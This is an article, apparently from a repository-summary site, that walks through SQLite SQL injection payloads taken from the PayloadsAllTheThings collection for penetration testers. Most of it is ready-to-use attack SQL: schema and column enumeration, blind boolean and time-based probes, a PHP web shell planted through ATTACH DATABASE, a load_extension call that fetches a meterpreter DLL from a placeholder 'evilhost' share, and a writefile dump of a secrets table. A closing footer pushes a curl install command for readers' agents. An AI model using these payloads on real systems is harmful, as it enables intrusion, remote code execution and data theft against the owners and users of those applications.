SQLite Specific SQL Injection Payloads: A Complete Guide from PayloadsAllTheThings
SQLite specific SQL injection payloads leverage comments, enumeration queries, blind boolean/time-based techniques, and file manipulation primitives to extract data or achieve remote code execution in embedded databases.
The swisskyrepo/PayloadsAllTheThings repository maintains a community-driven collection of SQLite specific SQL injection payloads targeting the lightweight, serverless database engine. These techniques are documented in SQL Injection/SQLite Injection.md and provide ready-to-use SQL snippets for penetration testers and security researchers. Because SQLite ships with embedded applications, mobile apps, and IoT devices, these methods are critical for testing client-side and local-file attack surfaces.
Comment Syntax and Query Termination
SQLite supports standard SQL comment syntax that attackers use to truncate the original query and append malicious SQL. According to the source code in SQL Injection/SQLite Injection.md, single-line comments begin with -- while multi-line comments use /**/ syntax to neutralize trailing query fragments.
-- <-- single-line comment
/**/ <-- multi-line comment
Database Enumeration Techniques
Version Discovery
To identify the SQLite engine version, invoke the sqlite_version() function. This returns the specific release number, helping attackers tailor database-specific syntax for subsequent queries.
select sqlite_version();
Schema Enumeration
Query the sqlite_master table to list user-created tables while filtering system objects. The group_concat() function aggregates results into a single string for easier extraction.
SELECT group_concat(tbl_name)
FROM sqlite_master
WHERE type='table'
AND tbl_name NOT LIKE 'sqlite_%';
Column Extraction
Use pragma_table_info() to extract column names from a target table. This SQLite-specific pragma inspects table definitions without requiring information_schema access.
SELECT GROUP_CONCAT(name)
FROM pragma_table_info('users');
Boolean-Based Blind Injection
When error messages are suppressed, blind techniques infer data through conditional responses. The repository provides payloads that force a runtime error when a condition evaluates to false using load_extension(), creating a distinguishable difference between true and false states.
AND CASE WHEN (SELECT count(*) FROM users) > 0 THEN 1 ELSE load_extension(1) END
Time-Based Detection
For scenarios where boolean indicators fail, time-based payloads induce measurable delays using randomblob(). The following payload generates approximately a 5-second delay when the condition is true, confirming logic through response timing.
AND 1337=LIKE('ABCDEFG',
UPPER(HEX(RANDOMBLOB(5000000000/2))))
Remote Code Execution Vectors
SQLite offers advanced primitives for code execution when specific features are enabled. The ATTACH DATABASE command allows writing files to the filesystem, while load_extension() can execute native operating system libraries.
Web Shell Creation via ATTACH DATABASE
This technique writes a PHP shell to the web root by creating a database file with an executable extension. As implemented in SQL Injection/SQLite Injection.md, the attacker attaches a new database path, creates a table, and inserts a PHP payload into the file structure.
ATTACH DATABASE '/var/www/shell.php' AS shell;
CREATE TABLE shell.pwn (dataz text);
INSERT INTO shell.pwn (dataz)
VALUES ('<?php system($_GET["cmd"]); ?>');
Native Extension Loading
If the load_extension() feature is compiled and enabled, attackers can load malicious DLLs from remote SMB shares or local paths to execute arbitrary code outside the database context.
SELECT load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
File System Manipulation
SQLite provides the non-standard writefile() function for direct file operations. As documented in the source file, this allows arbitrary file creation on the underlying operating system by selecting data into a specified path.
SELECT writefile('/tmp/evil.txt', data)
FROM secrets;
Summary
- SQLite specific SQL injection payloads in PayloadsAllTheThings target embedded applications through
sqlite_masterenumeration andpragma_table_info()column extraction. - Comment syntax (
--,/**/) terminates original queries to allow payload injection without syntax errors. - Blind techniques leverage
load_extension()errors andrandomblob()delays for inference-based data extraction when verbose errors are disabled. - Remote code execution is achievable through
ATTACH DATABASEfile writing andload_extension()DLL loading when dangerous features are enabled. - All payloads are cataloged in
SQL Injection/SQLite Injection.mdwith methodology tables mapping attack goals to specific SQL statements.
Frequently Asked Questions
What makes SQLite SQL injection different from other database systems?
SQLite injection targets a file-based, serverless engine commonly embedded in mobile and desktop applications. Unlike client-server databases, SQLite operates on local files, making ATTACH DATABASE and writefile() particularly dangerous for file system compromise on the host device.
How does the randomblob() function enable time-based detection?
The randomblob() function generates random binary data, and when passed a large argument (e.g., 5000000000 bytes), it consumes significant CPU cycles. Attackers wrap this in HEX() and LIKE() comparisons to create measurable delays, confirming true/false conditions without visible error messages in the application response.
Can SQLite injection lead to remote code execution on the server?
Yes, if SQLite is compiled with extension loading enabled, the load_extension() function can execute native operating system libraries. Additionally, the ATTACH DATABASE primitive allows writing executable files (like PHP shells) to the web root, achieving code execution through file system manipulation as detailed in SQL Injection/SQLite Injection.md.
Where can I find the complete list of SQLite payloads from this analysis?
The comprehensive collection resides in the SQL Injection/SQLite Injection.md file within the swisskyrepo/PayloadsAllTheThings repository. This file contains methodology tables, additional error-based payloads, and references to external exploit documentation for SQLite-specific attack vectors.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →